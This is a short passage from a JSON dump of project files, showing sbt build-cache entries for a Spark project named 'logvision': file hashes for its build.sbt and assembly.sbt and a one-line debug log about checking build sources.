    "content": "[\"sbt.Task[scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.nio.FileStamp]]]\",{\"hashes\":[[\"/Users/xander/Desktop/logvision/spark/build.sbt\",\"6d15a7456e78fe9d994f7e71139d3fb284a61ee0\"],[\"/Users/xander/Desktop/logvision/spark/project/assembly.sbt\",\"af2955bad7b3c0146330bef00eec7097b2f245cb\"]],\"lastModifiedTimes\":[]}]"
  },
  {
    "path": "spark/target/streams/_global/_global/checkBuildSources/_global/streams/out",
    "content": "[debug] Checking for meta build source updates\n"
  }
]